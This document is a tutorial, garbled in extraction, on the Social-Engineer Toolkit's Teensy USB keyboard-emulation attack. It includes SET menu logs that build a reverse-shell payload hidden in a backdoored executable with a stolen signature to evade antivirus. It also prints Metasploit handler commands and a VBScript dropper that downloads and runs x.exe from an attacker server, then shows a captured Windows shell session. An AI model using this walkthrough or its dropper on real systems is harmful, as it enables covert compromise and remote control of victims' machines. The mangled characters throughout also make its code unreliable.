#,./set , ,,,,,,,,,,,,,,,,..######..########.######## ,,,,,,,,,,,,,,,,.##....##.##..........##... ,,,,,,,,,,,,,,,,.##.......##..........##... ,,,,,,,,,,,,,,,,..######..######......##... ,,,,,,,,,,,,,,,,.......##.##..........##... ,,,,,,,,,,,,,,,,.##....##.##..........##... ,,,,,,,,,,,,,,,,..######..########....##... , ,,[333],,,,,,,The,Social3Engineer,Toolkit,(SET),,,,,,,,,,[333] ,,[333],,,,,,,,Created,by:,David,Kennedy,(ReL1K),,,,,,,,,[333] ,,[333],,,,,,,,Development,Team:,Thomas,Werth,,,,,,,,,,,,[333] ,,[333],,,,,,,,Development,Team:,JR,DePre,(pr1me),,,,,,,,[333] ,,[333],,,,,,,,Development,Team:,Joey,Furr,(j0fer),,,,,,,[333] ,,[333],,,,,,,,,,,,,,,,Version:,2.0.3,,,,,,,,,,,,,,,,,,,,[333] ,,[333],,,,,,,,,,,Codename:,'Trebuchet,Edition',,,,,,,,,,[333] ,,[333],,,,,,,,Report,bugs,to:,davek@secmaniac.com,,,,,,,[333] ,,[333],,,,,,,,,Follow,me,on,Twitter:,dave_rel1k,,,,,,,,,[333] ,,[333],,,,,,,,Homepage:,http://www.secmaniac.com,,,,,,,,[333] , ,,,Welcome,to,the,Social3Engineer,Toolkit,(SET).,Your,one ,,,,stop,shop,for,all,of,your,social3engineering,needs.. , ,,,,DerbyCon,2011,Sep303Oct02,3,http://www.derbycon.com. , ,,,,,Join,us,on,irc.freenode.net,in,channel,#setoolkit , ,Select,from,the,menu: , ,,,1),Spear3Phishing,Attack,Vectors ,,,2),Website,Attack,Vectors ,,,3),Infectious,Media,Generator ,,,4),Create,a,Payload,and,Listener ,,,5),Mass,Mailer,Attack ,,,6),Arduino3Based,Attack,Vector ,,,7),SMS,Spoofing,Attack,Vector ,,,8),Wireless,Access,Point,Attack,Vector ,,,9),Third,Party,Modules ,,10),Update,the,Metasploit,Framework ,,11),Update,the,Social3Engineer,Toolkit ,,12),Help,,Credits,,and,About , ,,99),Exit,the,Social3Engineer,Toolkit , set,> ,,,

5.2.1 Spear-Phishing Attack Vector

This attack can be used to send targeted emails with malicious attachments. Note that when using SET, you can create and save your own templates to use for future attacks.

5.2.2 Teensy USB HID Attack Vector

Note that you have to have arduino and arduino teensy software installed before you can proceed with this attack.

Traditionally, when you insert a DVD/CD or USB if autorun is disabled, your autorun.inf isnt called and you cant execute your code automatically. With the Teensy HID based device you can emulate a keyboard and mouse. When you insert a device it will be detected as a keyboard, and with the microprocessor and onboard flash memory storage you can send a very fast set of keystrokes to the machine and completely compromise it. Ok, lets create a wscript file, which will download an executable (the metasploit payload) and execute it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 set.>.6.[Arduino8Based.Attack.Vector] set:arduino.>.2.[WSCRIPT.HTTP.GET.MSF.Payload] .Do.you.want.to.create.a.payload.and.listener.[yes|no]:.yes set:payloads.>.1.[Windows.Shell.Reverse_TCP] set:encoding.>.16..[Backdoored.Executable.(BEST)] set:payloads.>.PORT.of.the.listener.[443]: [8].Backdooring.a.legit.executable.to.bypass.Anti8Virus..Wait.a.few.seconds... [*].Backdoor.completed.successfully..Payload.is.now.hidden.within.a.legit.executable. [*].UPX.Encoding.is.set.to.ON,.attempting.to.pack.the.executable.with.UPX.encoding. [8].Packing.the.executable.and.obfuscating.PE.file.randomly,.one.moment. [*].Digital.Signature.Stealing.is.ON,.hijacking.a.legit.digital.certificate . [*].PDE.file.created..You.can.get.it.under.'reports/teensy.pde' [*].Be.sure.to.select."Tools",."Board",.and."Teensy.2.0.(USB/KEYBOARD)".in.Arduino . [*].If.your.running.into.issues.with.VMWare.Fusion.and.the.start.menu,.uncheck the.'Enable.Key.Mapping'.under.preferences.in.VMWare . [*].Launching.MSF.Listener... [*].This.may.take.a.few.to.load.MSF... [8].*** [8].*.WARNING:.Database.support.has.been.disabled [8].*** . . . .......=[.metasploit.v4.0.08release.[core:4.0.api:1.0] +.88.88=[.716.exploits.8.361.auxiliary.8.68.post +.88.88=[.226.payloads.8.27.encoders.8.8.nops .......=[.svn.r13462.updated.32.days.ago.(2011.08.01) . resource.(src/program_junk/meta_config)>.use.exploit/multi/handler resource.(src/program_junk/meta_config)>.set.PAYLOAD.windows/shell_reverse_tcp resource.(src/program_junk/meta_config)>.set.LHOST.0.0.0.0 resource.(src/program_junk/meta_config)>.set.LPORT.443 resource.(src/program_junk/meta_config)>.set.ExitOnSession.false resource.(src/program_junk/meta_config)>.exploit.8j [*].Exploit.running.as.background.job. [*].Started.reverse.handler.on.0.0.0.0:443 [*].Starting.the.payload.handler... ...

We can see that the SET exported the teensy.pde to the reports/ folder. Now that the file is ready, we need to upload it to the arduino board. In the arduino software package select the Tools - Board - Teensy 2.0 ; Tools - USB Type: Keyboard and Mouse (not Serial). Then drag the pde file into the arduino interface and upload the code. Do you notice something weird: the SET didnt ask us for the IP address. This is because AUTO_DETECT is set to on in the config file, which means it automatically gave the payload the IP address of out ethernet address. So we need to change that if we want to change the IP address: 1 2 AUTO_DETECT=OFF ...

Once the USB device is inserted on the victim machine the teensy.pde program is executed, which creates an omg.vbs script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 strFileURL5=5"http://10.1.1.2/x.exe" strHDLocation5=5"x.exe" Set5objXMLHTTP5=5CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open5"GET",5strFileURL,5false If5objXMLHTTP.Status5=52005Then Set5objADOStream5=5CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type5=51 objADOStream.Write5objXMLHTTP.ResponseBody objADOStream.Position5=50 Set5objFSO5=5Createobject("Scripting.FileSystemObject") If5objFSO.Fileexists(strHDLocation)5Then5objFSO.DeleteFile5strHDLocation Set5objFSO5=5Nothing objADOStream.SaveToFile5strHDLocation objADOStream.Close Set5objADOStream5=5Nothing End5if Set5objXMLHTTP5=5Nothing 555

Here we can see that the VBScript actually only downloads the x.exe from the server, which in our case is 10.1.1.2:80. We need to make sure that the apache is running on the attacker host and the x.exe file is present - http://10.1.1.2/x.exe (we need to copy it to the DocumentRoot from the ./set/src/webattack/web_clone/site/template/x.exe). When the x.exe file is downloaded to the victim computer, it is executed, which connects back to the attacker computer on the port 443 - so we need to be listening on that port also. We can also check that the right ports are opened on the attacker: 1 2 3 4 #5netstat5_landtp tcp555555550555555050.0.0.0:44355555555555550.0.0.0:*555555555555555LISTEN55555517430/ruby tcp65555555055555505:::805555555555555555555:::*55555555555555555555LISTEN55555516670/apache2 555

After the x.exe is executed we should see something like this: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

[*]5Command5shell5session515opened5(10.1.1.2:4435_>510.1.1.3:1402)5at5Fri5Sep502516:40:185+020052 5 msf55exploit(handler)5>5sessions 5 Active5sessions =============== 5 55Id55Type55555555555Information55Connection 55__55____55555555555___________55__________ 551555shell5windows55555555555555510.1.1.2:4435_>510.1.1.3:1402 5 msf55exploit(handler)5>5sessions5_i51 [*]5Starting5interaction5with51... 5 Microsoft5Windows5XP5[Version55.1.2600] (C)5Copyright51985_20015Microsoft5Corp. 5 C:\Documents5and5Settings\deki\Desktop> 555

And weve got a shell. But it would be wise to discuss the drawbacks of this method now: When the teensy is plugged in, it displays all the commands, so they are visible to the user - and youre not allowed to click anything while the script is working, because it executes commands in currently

active window (which would not be cmd.exe anymore, if we would have touched something). The x.exe is detected by the antivirus as a trojan horse, so it is immediately deleted, thus not being executed. This results in a non successful attack, since we cant get the victims shell.